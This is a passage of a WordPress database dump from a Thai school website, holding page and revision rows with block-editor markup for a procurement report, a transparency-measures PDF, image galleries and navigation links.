embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true[/embedpress]','รายงานการจัดซื้อจัดจ้งหรือจัดหาพัสดุ ปีงบประมาณ2567','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:55:27','2025-07-01 07:55:27','',1571,'http://pakhaeng.ssk.in.th/?p=1592',0,'revision','',0),
(1594,1,'2025-07-02 10:38:58','2025-07-02 03:38:58','<!-- wp:file {\"id\":1595,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf\",\"displayPreview\":true,\"previewHeight\":800} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:800px\" aria-label=\"มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา\"></object><a id=\"wp-block-file--media-999e8bfc-e885-41e0-8e3b-b8e6b8b01dd6\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-999e8bfc-e885-41e0-8e3b-b8e6b8b01dd6\">Download</a></div>\n<!-- /wp:file -->','มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา','','publish','closed','closed','','%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1-2','','','2025-07-02 10:39:00','2025-07-02 03:39:00','',0,'http://pakhaeng.ssk.in.th/?page_id=1594',0,'page','',0),
(1595,1,'2025-07-02 10:38:26','2025-07-02 03:38:26','','มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา','','inherit','','closed','','%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1-3','','','2025-07-02 10:38:26','2025-07-02 03:38:26','',1594,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf',0,'attachment','application/pdf',0),
(1596,1,'2025-07-02 10:38:58','2025-07-02 03:38:58','<!-- wp:file {\"id\":1595,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf\",\"displayPreview\":true,\"previewHeight\":800} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:800px\" aria-label=\"มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา\"></object><a id=\"wp-block-file--media-999e8bfc-e885-41e0-8e3b-b8e6b8b01dd6\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-999e8bfc-e885-41e0-8e3b-b8e6b8b01dd6\">Download</a></div>\n<!-- /wp:file -->','มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา','','inherit','closed','closed','','1594-revision-v1','','','2025-07-02 10:38:58','2025-07-02 03:38:58','',1594,'http://pakhaeng.ssk.in.th/?p=1596',0,'revision','',0),
(1597,1,'2025-07-02 10:40:05','2025-07-02 03:40:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" 